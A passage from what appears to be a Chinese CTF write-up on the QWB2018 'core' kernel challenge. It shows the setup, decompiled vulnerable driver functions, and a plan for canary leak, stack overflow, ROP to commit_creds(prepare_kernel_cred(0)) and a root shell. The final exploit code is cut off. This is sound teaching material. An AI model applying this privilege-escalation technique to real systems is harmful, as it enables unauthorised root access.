class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">give_to_player <span class="o">[</span>master●●<span class="o">]</span> ls bzImage core.cpio start.sh vmlinux give_to_player <span class="o">[</span>master●●<span class="o">]</span> bat start.sh ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: start.sh ───────┼───────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ qemu-system-x86_64 <span class="se">\ </span><span class="se"></span> <span class="m">2</span> │ -m 64M <span class="se">\ </span><span class="se"></span> <span class="m">3</span> │ -kernel ./bzImage <span class="se">\ </span><span class="se"></span> <span class="m">4</span> │ -initrd ./core.cpio <span class="se">\ </span><span class="se"></span> <span class="m">5</span> │ -append <span class="s2">&#34;root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr&#34;</span> <span class="se">\ </span><span class="se"></span> <span class="m">6</span> │ -s <span class="se">\ </span><span class="se"></span> <span class="m">7</span> │ -netdev user,id<span class="o">=</span>t0, -device e1000,netdev<span class="o">=</span>t0,id<span class="o">=</span>nic0 <span class="se">\ </span><span class="se"></span> <span class="m">8</span> │ -nographic <span class="se">\ </span><span class="se"></span>───────┴───────────────────────────────────────────────────────────────────────────────── </code></pre></td></tr></table> </div> </div><p>发现内核开启了 kaslr 保护。</p> <p>解压 <code>core.cpio</code> 后，看一下 init</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">give_to_player <span class="o">[</span>master●<span class="o">]</span> file core.cpio core.cpio: gzip compressed data, last modified: Fri Mar <span class="m">23</span> 13:41:13 2018, max compression, from Unix, original size <span class="m">53442048</span> give_to_player <span class="o">[</span>master●<span class="o">]</span> mkdir core give_to_player <span class="o">[</span>master●<span class="o">]</span> <span class="nb">cd</span> core core <span class="o">[</span>master<span class="o">]</span> mv ../core.cpio core.cpio.gz core <span class="o">[</span>master●<span class="o">]</span> gunzip ./core.cpio.gz core <span class="o">[</span>master●<span class="o">]</span> cpio -idm &lt; ./core.cpio <span class="m">104379</span> 块 core <span class="o">[</span>master●<span class="o">]</span> bat init ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: init ───────┼───────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ <span class="c1">#!/bin/sh</span> <span class="m">2</span> │ mount -t proc proc /proc <span class="m">3</span> │ mount -t sysfs sysfs /sys <span class="m">4</span> │ mount -t devtmpfs none /dev <span class="m">5</span> │ /sbin/mdev -s <span class="m">6</span> │ mkdir -p /dev/pts <span class="m">7</span> │ mount -vt devpts -o <span class="nv">gid</span><span class="o">=</span>4,mode<span class="o">=</span><span class="m">620</span> none /dev/pts <span class="m">8</span> │ chmod <span class="m">666</span> /dev/ptmx <span class="m">9</span> │ cat /proc/kallsyms &gt; /tmp/kallsyms <span class="m">10</span> │ <span class="nb">echo</span> <span class="m">1</span> &gt; /proc/sys/kernel/kptr_restrict <span class="m">11</span> │ <span class="nb">echo</span> <span class="m">1</span> &gt; /proc/sys/kernel/dmesg_restrict <span class="m">12</span> │ ifconfig eth0 up <span class="m">13</span> │ udhcpc -i eth0 <span class="m">14</span> │ ifconfig eth0 10.0.2.15 netmask 255.255.255.0 <span class="m">15</span> │ route add default gw 10.0.2.2 <span class="m">16</span> │ insmod /core.ko <span class="m">17</span> │ <span class="m">18</span> │ poweroff -d <span class="m">120</span> -f <span class="p">&amp;</span> <span class="m">19</span> │ setsid /bin/cttyhack setuidgid <span class="m">1000</span> /bin/sh <span class="m">20</span> │ <span class="nb">echo</span> <span class="s1">&#39;sh end!\n&#39;</span> <span class="m">21</span> │ umount /proc <span class="m">22</span> │ umount /sys <span class="m">23</span> │ <span class="m">24</span> │ poweroff -d <span class="m">0</span> -f ───────┴──────────────────────────── </code></pre></td></tr></table> </div> </div><p>发现了几处有意思的地方：</p> <ul> <li>第 9 行中把 <code>kallsyms</code> 的内容保存到了 <code>/tmp/kallsyms</code> 中，那么我们就能从 <code>/tmp/kallsyms</code> 中读取 <code>commit_creds</code>，<code>prepare_kernel_cred</code> 的函数的地址了</li> <li>第 10 行把 <code>kptr_restrict</code> 设为 1，这样就不能通过 <code>/proc/kallsyms</code> 查看函数地址了，但第 9 行已经把其中的信息保存到了一个可读的文件中，这句就无关紧要了</li> <li>第 11 行把 <code>dmesg_restrict</code> 设为 1，这样就不能通过 <code>dmesg</code> 查看 kernel 的信息了</li> <li>第 18 行设置了定时关机，为了避免做题时产生干扰，直接把这句删掉然后重新打包</li> </ul> <p>同时还发现了一个 shell 脚本 <code>gen_cpio.sh</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">core <span class="o">[</span>master●<span class="o">]</span> bat gen_cpio.sh ───────┬───────────────────────────────────────────────────────────────────────────────── │ File: gen_cpio.sh ───────┼───────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ find . -print0 <span class="se">\ </span><span class="se"></span> <span class="m">2</span> │ <span class="p">|</span> cpio --null -ov --format<span class="o">=</span>newc <span class="se">\ </span><span class="se"></span> <span class="m">3</span> │ <span class="p">|</span> gzip -9 &gt; <span class="nv">$1</span> ───────┴───────────────────────────────────────────────────────────────────────────────── </code></pre></td></tr></table> </div> </div><p>从名称和内容都可以看出这是一个方便打包的脚本，我们修改好 init 后重新打包，尝试运行 kernel</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">core <span class="o">[</span>master●●<span class="o">]</span> vim init core <span class="o">[</span>master●●<span class="o">]</span> rm core.cpio core <span class="o">[</span>master●●<span class="o">]</span> ./gen_cpio.sh core.cpio . ./usr ./usr/sbin ./usr/sbin/popmaildir ...... ...... ./core.cpio ./core.ko <span class="m">129851</span> 块 core <span class="o">[</span>master●●<span class="o">]</span> ls bin core.ko gen_cpio.sh lib linuxrc root sys usr core.cpio etc init lib64 proc sbin tmp vmlinux core <span class="o">[</span>master●●<span class="o">]</span> mv core.cpio .. core <span class="o">[</span>master●●<span class="o">]</span> <span class="nb">cd</span> .. give_to_player <span class="o">[</span>master●●<span class="o">]</span> ./start.sh </code></pre></td></tr></table> </div> </div><p>但这时候又遇到了新问题，内核运行不起来，从一闪即逝的报错信息中能看到是因为分配的内存过小，<code>start.sh</code> 中 <code>-m</code> 分配的是 64M，修改为 128M，终于能运行起来了。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">/ $ lsmod core <span class="m">16384</span> <span class="m">0</span> - Live 0x0000000000000000 <span class="o">(</span>O<span class="o">)</span> ...... ...... give_to_player <span class="o">[</span>master●●<span class="o">]</span> cp core/core.ko . give_to_player <span class="o">[</span>master●●<span class="o">]</span> check ./core.ko ./core.ko: ELF 64-bit LSB relocatable, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, BuildID<span class="o">[</span>sha1<span class="o">]=</span>549436683d <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/pwn_repo/QWB2018_core/give_to_player/core.ko&#39;</span> Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x0<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p>可以看出开启了 canary 保护，用 IDA 打开进一步分析。</p> <p><strong>init_module()</strong> 注册了 <code>/proc/core</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="nf">init_module</span><span class="p">()</span> <span class="p">{</span> <span class="n">core_proc</span> <span class="o">=</span> <span class="n">proc_create</span><span class="p">(</span><span class="s">&#34;core&#34;</span><span class="p">,</span> <span class="mi">438LL</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">core_fops</span><span class="p">);</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: created /proc/core entry</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>exit_core()</strong> 删除 <code>/proc/core</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="nf">exit_core</span><span class="p">()</span> <span class="p">{</span> <span class="kr">__int64</span> <span class="n">result</span><span class="p">;</span> <span class="c1">// rax </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span> <span class="n">core_proc</span> <span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">remove_proc_entry</span><span class="p">(</span><span class="s">&#34;core&#34;</span><span class="p">);</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>core_ioctl()</strong> 定义了三条命令，分别调用 <strong>core_read()</strong>，<strong>core_copy_func()</strong> 和设置全局变量 <strong>off</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">core_ioctl</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">int</span> <span class="n">a2</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="k">switch</span> <span class="p">(</span> <span class="n">a2</span> <span class="p">)</span> <span class="p">{</span> <span class="k">case</span> <span class="mh">0x6677889B</span><span class="o">:</span> <span class="n">core_read</span><span class="p">(</span><span class="n">a3</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="k">case</span> <span class="mh">0x6677889C</span><span class="o">:</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: %d</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="n">off</span> <span class="o">=</span> <span class="n">a3</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span> <span class="k">case</span> <span class="mh">0x6677889A</span><span class="o">:</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: called core_copy</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="n">core_copy_func</span><span class="p">(</span><span class="n">a3</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="n">core_copy_func</span><span class="p">(</span><span class="n">v3</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>core_read()</strong> 从 <code>v4[off]</code> 拷贝 64 个字节到用户空间，但要注意的是全局变量 <code>off</code> 使我们能够控制的，因此可以合理的控制 <code>off</code> 来 leak canary 和一些地址</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">core_read</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="kt">char</span> <span class="o">*</span><span class="n">v2</span><span class="p">;</span> <span class="c1">// rdi </span><span class="c1"></span> <span class="kt">signed</span> <span class="kr">__int64</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// rcx </span><span class="c1"></span> <span class="kt">char</span> <span class="n">v4</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-50h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+40h] [rbp-10h] </span><span class="c1"></span> <span class="n">v1</span> <span class="o">=</span> <span class="n">a1</span><span class="p">;</span> <span class="n">v5</span> <span class="o">=</span> <span class="n">__readgsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: called core_read</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016</span><span class="s">%d %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">v4</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">16LL</span><span class="p">;</span> <span class="n">i</span><span class="p">;</span> <span class="o">--</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="p">(</span><span class="n">_DWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">v2</span> <span class="o">+=</span> <span class="mi">4</span><span class="p">;</span> <span class="p">}</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">v4</span><span class="p">,</span> <span class="s">&#34;Welcome to the QWB CTF challenge.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">copy_to_user</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">v4</span><span class="p">[</span><span class="n">off</span><span class="p">],</span> <span class="mi">64LL</span><span class="p">)</span> <span class="p">)</span> <span class="kr">__asm</span> <span class="p">{</span> <span class="n">swapgs</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>core_copy_func()</strong> 从全局变量 <code>name</code> 中拷贝数据到局部变量中，长度是由我们指定的，当要注意的是 qmemcpy 用的是 <code>unsigned __int16</code>，但传递的长度是 <code>signed __int64</code>，因此如果控制传入的长度为 <code>0xffffffffffff0000|(0x100)</code> 等值，就可以栈溢出了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">core_copy_func</span><span class="p">(</span><span class="kt">signed</span> <span class="kr">__int64</span> <span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">v1</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-50h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+40h] [rbp-10h] </span><span class="c1"></span> <span class="n">v2</span> <span class="o">=</span> <span class="n">__readgsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: called core_writen&#34;</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span> <span class="o">&gt;</span> <span class="mi">63</span> <span class="p">)</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016D</span><span class="s">etect Overflow&#34;</span><span class="p">);</span> <span class="k">else</span> <span class="n">qmemcpy</span><span class="p">(</span><span class="n">v1</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int16</span><span class="p">)</span><span class="n">a1</span><span class="p">);</span> <span class="c1">// overflow </span><span class="c1"></span><span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><strong>core_write()</strong> 向全局变量 <code>name</code> 上写，这样通过 <code>core_write()</code> 和 <code>core_copy_func()</code> 就可以控制 ropchain 了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">signed</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">core_write</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a2</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="n">v3</span> <span class="o">=</span> <span class="n">a3</span><span class="p">;</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: called core_writen&#34;</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">&lt;=</span> <span class="mh">0x800</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">v3</span><span class="p">)</span> <span class="p">)</span> <span class="k">return</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)</span><span class="n">v3</span><span class="p">;</span> <span class="n">printk</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\x016c</span><span class="s">ore: error copying data from userspacen&#34;</span><span class="p">);</span> <span class="k">return</span> <span class="mh">0xFFFFFFF2LL</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><h4 id="思路-1">思路</h4> <p>经过如上的分析，可以得出以下的思路：</p> <ol> <li>通过 ioctl 设置 off，然后通过 core_read() leak 出 canary</li> <li>通过 core_write() 向 name 写，构造 ropchain</li> <li>通过 core_copy_func() 从 name 向局部变量上写，通过设置合理的长度和 canary 进行 rop</li> <li>通过 rop 执行 <code>commit_creds(prepare_kernel_cred(0))</code></li> <li>返回用户态，通过 system(&quot;/bin/sh&rdquo;) 等起 shell</li> </ol> <p>解释一下：</p> <ul> <li> <p>如何获得 commit_creds()，prepare_kernel_cred() 的地址？</p> <ul> <li>/tmp/kallsyms 中保存了这些地址，可以直接读取，同时根据偏移固定也能确定 gadgets 的地址</li> </ul> </li> <li> <p>如何返回用户态？</p> <ul> <li><code>swapgs; iretq</code>，之前说过需要设置 <code>cs, rflags</code> 等信息，可以写一个函数保存这些信息</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="c1">// intel flavor assembly </span><span class="c1"></span><span class="n">size_t</span> <span class="n">user_cs</span><span class="p">,</span> <span class="n">user_ss</span><span class="p">,</span> <span class="n">user_rflags</span><span class="p">,</span> <span class="n">user_sp</span><span class="p">;</span> <span class="kt">void</span> <span class="nf">save_status</span><span class="p">()</span> <span class="p">{</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">&#34;mov user_cs, cs;&#34;</span> <span class="s">&#34;mov user_ss, ss;&#34;</span> <span class="s">&#34;mov user_sp, rsp;&#34;</span> <span class="s">&#34;pushf;&#34;</span> <span class="s">&#34;pop user_rflags;&#34;</span> <span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]status has been saved.&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// at&amp;t flavor assembly </span><span class="c1"></span><span class="kt">void</span> <span class="nf">save_stats</span><span class="p">()</span> <span class="p">{</span> <span class="k">asm</span><span class="p">(</span> <span class="s">&#34;movq %%cs, %0</span><span class="se">\n</span><span class="s">&#34;</span> <span class="s">&#34;movq %%ss, %1</span><span class="se">\n</span><span class="s">&#34;</span> <span class="s">&#34;movq %%rsp, %3</span><span class="se">\n</span><span class="s">&#34;</span> <span class="s">&#34;pushfq</span><span class="se">\n</span><span class="s">&#34;</span> <span class="s">&#34;popq %2</span><span class="se">\n</span><span class="s">&#34;</span> <span class="o">:</span><span class="s">&#34;=r&#34;</span><span class="p">(</span><span class="n">user_cs</span><span class="p">),</span> <span class="s">&#34;=r&#34;</span><span class="p">(</span><span class="n">user_ss</span><span class="p">),</span> <span class="s">&#34;=r&#34;</span><span class="p">(</span><span class="n">user_eflags</span><span class="p">),</span><span class="s">&#34;=r&#34;</span><span class="p">(</span><span class="n">user_sp</span><span class="p">)</span> <span class="o">:</span> <span class="o">:</span> <span class="s">&#34;memory&#34;</span> <span class="p">);</span> </code></pre></td></tr></table> </div> </div></li> </ul> <p>} ```</p> <ul> <li>Why bother returning to Userspace? <ul> <li>Most useful things we want to do are much easier from userland.</li> <li>In KernelSpace, there’s no easy way to: <ul> <li>Modify the filesystem</li> <li>Create a new process</li> <li>Create network connections</li> </ul> </li> </ul> </li> </ul> <h4 id="exploit-1">Exploit</h4> <p>先说一下怎么调试，qemu 内置有 gdb 的接口，通过 help 查看</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">give_to_player <span class="o">[</span>master●●<span class="o">]</span> qemu-system-x86_64 --help <span class="p">|</span> grep gdb -gdb dev <span class="nb">wait</span> <span class="k">for</span> gdb connection on <span class="s1">&#39;dev&#39;</span> -s shorthand <span class="k">for</span> -gdb tcp::1234 </code></pre></td></tr></table> </div> </div><p>即可以通过 <code>-gdb tcp:port</code> 或者 <code>-s</code> 来开启调试端口，<code>start.sh</code> 中已经有了 <code>-s</code>，不必再自己设置。</p> <p>另外通过 <code>gdb ./vmlinux</code> 启动时，虽然加载了 kernel 的符号表，但没有加载驱动 <code>core.ko</code> 的符号表，可以通过 <code>add-symbol-file core.ko textaddr</code> 加载</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">pwndbg&gt; <span class="nb">help</span> add-symbol-file Load symbols from FILE, assuming FILE has been dynamically loaded. Usage: add-symbol-file FILE ADDR <span class="o">[</span>-s &lt;SECT&gt; &lt;SECT_ADDR&gt; -s &lt;SECT&gt; &lt;SECT_ADDR&gt; ...<span class="o">]</span> ADDR is the starting address of the file<span class="err">&#39;</span>s text. The optional arguments are section-name section-address pairs and should be specified <span class="k">if</span> the data and bss segments are not contiguous with the text. SECT is a section name to be loaded at SECT_ADDR. </code></pre></td></tr></table> </div> </div><p>.text 段的地址可以通过 <code>/sys/modules/core/section/.text</code> 来查看，查看需要 root 权限，因此为了方便调试，我们再改一下 <code>init</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash"><span class="c1"># setsid /bin/cttyhack setuidgid 1000 /bin/sh</span> setsid /bin/cttyhack setuidgid <span class="m">0</span> /bin/sh </code></pre></td></tr></table> </div> </div><p>重新打包，这样启动的时候就是 root 权限了。</p> <p>比如：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span 